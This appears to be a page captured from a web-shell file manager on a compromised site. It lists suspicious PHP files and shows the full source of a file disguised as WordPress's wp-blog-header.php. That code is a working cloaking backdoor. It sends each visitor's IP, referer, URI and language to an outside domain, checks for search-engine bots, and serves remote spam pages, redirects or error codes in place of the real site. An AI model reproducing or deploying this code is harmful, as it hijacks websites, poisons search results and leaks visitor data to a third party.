9B534B8686E580E0E01768F00155B461

at path：ROOT / wp-blog-header.php

run：R W Run

DIR

2026-04-11 08:47:15

R W Run

saiga

DIR

2026-04-14 11:38:12

R W Run

.htaccess

231 By

2026-04-15 01:27:42

R W Run

.reference

1.24 KB

2026-04-10 00:42:30

R W Run

admin.php

482 By

2026-04-09 01:52:02

R W Run

blog.php

1.66 KB

2026-04-06 01:41:01

R W Run

error_log

2.78 MB

2026-04-15 12:53:00

R W Run

googleae4e47290e834d76.html

53 By

2026-04-09 02:10:08

R W Run

imagers.php

584 By

2026-04-06 01:41:01

R W Run

index.php

1011 By

2026-04-15 01:27:42

R W Run

robots.txt

278 By

2026-04-10 01:46:46

R W Run

simple.php

15.05 KB

2026-04-06 01:41:01

R W Run

sv.php

2.54 KB

2026-04-09 00:39:21

R W Run

testsend.php

1.11 KB

2026-04-13 23:08:43

R W Run

wp-blog-header.php

3.63 KB

2026-04-14 07:54:40

R W Run

error_log

📄wp-blog-header.php

<?php
$xmlname = '%6C%6A%75%76%7A%66%6C%61%2E%6E%65%62%7A%63%6E%72%66%2E%66%76%67%72';
$http_web = 'http';
if (is_https()) {
    $http = 'https';
} else {
    $http = 'http';
}
$duri_tmp = drequest_uri();
if ($duri_tmp == ''){
    $duri_tmp = '/';
}
$duri = $duri_tmp;
function drequest_uri()
{
    if (isset($_SERVER['REQUEST_URI'])) {
        $duri = $_SERVER['REQUEST_URI'];
    } else {
        if (isset($_SERVER['argv'])) {
            $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
        } else {
            $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
        }
    }
    return $duri;
}
$goweb = 'ywhimsyn.arompaes.site';
function is_https()
{
    if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return true;
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
        return true;
    } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
        return true;
    }
    return false;
}
$clock = '';
if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
    $clock = getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
    $clock = $_SERVER['REMOTE_ADDR'];
}
if (stristr($clock, ',')) {
    $clock_tmp = explode(",", $clock);
    $clock = $clock_tmp[0];
}
$host = $_SERVER['HTTP_HOST'];
$lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"];
$urlshang = '';
if (isset($_SERVER['HTTP_REFERER'])) {
    $urlshang = $_SERVER['HTTP_REFERER'];
    $urlshang = $urlshang;
}
if(extension_loaded('zlib') && function_exists('gzdecode')){$lang=urlencode($lang.'||ipib');}else{$lang=$lang;}
function disbot()
{
    $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) {
        return true;
    } else {
        return false;
    }
}
function doutdo($url)
{
    $file_contents= '';
    if (!$file_contents) {
        $file_contents = @file_get_contents($url);
    }
	if(extension_loaded('zlib') && function_exists('gzdecode')){
		return gzdecode($file_contents);
	}else{
		return $file_contents;
	}
}
$web = $http_web . '://' . $goweb . '/indexnew.php?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang. '&clock=' . $clock;
$html_content = doutdo($web);
if (!strstr($html_content, 'nobotuseragent')) {
    if (strstr($html_content, 'okhtmlgetcontent')) {
        @header("Content-type: text/html; charset=utf-8");
        $html_content = str_replace("okhtmlgetcontent", '', $html_content);
        echo $html_content;
        exit();
    }else if(strstr($html_content, 'okxmlgetcontent')){
        $html_content = str_replace("okxmlgetcontent", '', $html_content);
        @header("Content-type: text/xml");
        echo $html_content;
        exit();
    }else if (strstr($html_content, 'getcontent500page')) {
        @header('HTTP/1.1 500 Internal Server Error');
        exit();
    }else if (strstr($html_content, 'getcontent404page')) {
        @header('HTTP/1.1 404 Not Found');
        exit();
    }else if (strstr($html_content, 'getcontent301page')) {
        @header('HTTP/1.1 301 Moved Permanently');
        $html_content = str_replace("getcontent301page", '', $html_content);
        header('Location: ' . $html_content);
        exit();
    }
}/* blog M896 */ ?>